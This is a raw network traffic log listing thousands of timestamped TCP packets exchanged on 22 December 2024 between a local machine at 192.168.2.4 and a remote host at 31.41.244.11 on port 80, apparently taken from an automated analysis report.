                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.830108881 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.831918001 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.831971884 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.832027912 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.832082987 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.833889961 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.833941936 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.833970070 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.834032059 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.835783958 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.835841894 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.835931063 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.835988045 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.837775946 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.837877989 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.837888956 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.837946892 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.839660883 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.839720011 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.839776993 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.839833021 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.841645002 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.841703892 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.841753960 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.841811895 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.843525887 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.843580008 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.843647957 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.843703032 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.845469952 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.845539093 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.845593929 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.845669985 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.847446918 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.847501993 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.847590923 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.847646952 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.849349022 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.849442005 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.849447966 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.849513054 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.851339102 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.851397038 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.851499081 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.851553917 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.853245974 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.853302002 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.853360891 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.853415012 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.855170965 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.855226040 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.855281115 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.855331898 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.857098103 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.857160091 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.857196093 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.857261896 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.859054089 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.859112024 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.859185934 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.859261036 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.860991001 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.861088991 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.861095905 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.861139059 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.862916946 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.862974882 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.863037109 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.863101959 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.864864111 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.864923000 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.864969969 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.865046978 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.866780996 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.866838932 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.866911888 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.866976023 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.868727922 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.868783951 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.868870974 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.868936062 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.870798111 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.870835066 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.870853901 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.870894909 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.872617006 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.872719049 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.872725964 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.872772932 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.874550104 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.874602079 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.874615908 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.874659061 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.876468897 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.876529932 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.876602888 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.876667976 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.878411055 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.878474951 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.878504992 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.878571033 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.880363941 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.880419970 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.880475998 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.880526066 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.882358074 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.882411003 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.882431984 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.882464886 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.884238958 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.884291887 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.884299040 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.884347916 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.886188030 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.886243105 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.886317015 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.886365891 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.888103962 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.888164043 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.888237000 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.888303995 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.890033960 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.890094042 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.890139103 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.890194893 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.891987085 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.892043114 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.892117977 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.892180920 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.893919945 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.893980026 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.894073009 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.894129038 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.895858049 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.895914078 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.896003962 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.896063089 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.897814035 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.897882938 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.897924900 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.897994041 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.899750948 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.899811029 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.899872065 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.899933100 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.901689053 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.901746035 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.901810884 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.901864052 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.903611898 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.903711081 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.903717041 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.903767109 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.905549049 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.905610085 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.905668020 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.905728102 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.907507896 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.907568932 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.907613039 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.907659054 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.909430981 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.909488916 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.909497023 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.909559965 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.005662918 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.005747080 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.005758047 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.005815029 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.006463051 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.006537914 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.006561995 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.006614923 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.008057117 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.008112907 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.008183956 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.008244991 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.009625912 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.009681940 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.009788036 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.009839058 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.011254072 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.011288881 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.011326075 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.011360884 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.012757063 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.012809992 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.012881994 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.012954950 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.014317989 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.014375925 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.014440060 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.014511108 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.015851021 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.015903950 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.015909910 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.015966892 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.017355919 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.017407894 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.017482996 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.017539024 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.018894911 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.018946886 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.018954039 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.019009113 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.020355940 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.020411015 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.020474911 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.020539045 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.021831036 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.021936893 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.021946907 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.022008896 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.023269892 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.023344040 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.023397923 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.023458958 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.024720907 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.024772882 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.024844885 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.024904013 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.026155949 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.026212931 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.026273966 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.026329041 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.027553082 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.027604103 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.027842999 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.027896881 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.028983116 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.029038906 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.029107094 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.029167891 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.030359030 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.030443907 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.030745983 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.030803919 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.031753063 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.031847954 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.031929016 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.032032967 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.033112049 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.033179998 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.033233881 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.033288002 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.034480095 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.034538031 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.034609079 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.034674883 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.035840988 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.035913944 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.035948992 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.036010981 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.037201881 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.037286997 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.037317991 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.037370920 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.038615942 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.038686991 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.038827896 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.038885117 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.039937019 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.040009022 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.040081978 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.040143967 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.041301012 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.041368008 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.041456938 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.041511059 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.042673111 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.042738914 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.042797089 CET804976531.41.244.11192.168.2.4
